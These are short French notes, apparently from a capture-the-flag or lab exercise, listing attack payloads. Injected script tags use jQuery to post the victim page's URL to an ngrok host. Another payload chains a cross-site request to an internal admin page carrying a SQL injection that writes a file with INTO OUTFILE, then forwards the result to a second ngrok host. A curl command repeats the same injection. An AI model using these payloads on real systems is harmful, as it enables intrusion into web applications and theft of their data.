chmod 777 tmp -R 

ajouter des trucs random dans les noms de page pour ne pas avoir de risque de guess

Payload : 

 Trouver l'url : 
	<p><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
	<script>
	$.post('http://8c0422da.ngrok.io',{url:window.location.href},function(a){
	 document.write(a);
	});
	</script></p>

 SQli Upload : 
	<p><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
	<script>
		$.get("http://172.13.37.10/the-admin-secure-interface/stats.php?id=-100%27%20UNION%20ALL%20SELECT%20NULL,%22toto%22%20into%20outfile%20%22%2Ftmp%2Ftest%22%20--%20GaAM",function(data){
	  		$.post('http://5c11bac9.ngrok.io/datas=toto',{ name: data, time: "2pm" },function(a){
  				document.write(a);
  			});
	  	});
	</script></p>

sqli sans csrf : 
 curl 'http://localhost/the-admin-secure-interface/stats.php?id=-100%27%20UNION%20ALL%20SELECT%20NULL,%22toto%22%20into%20outfile%20%22%2Ftmp%2Ftest%22%20--%20GaAM' 

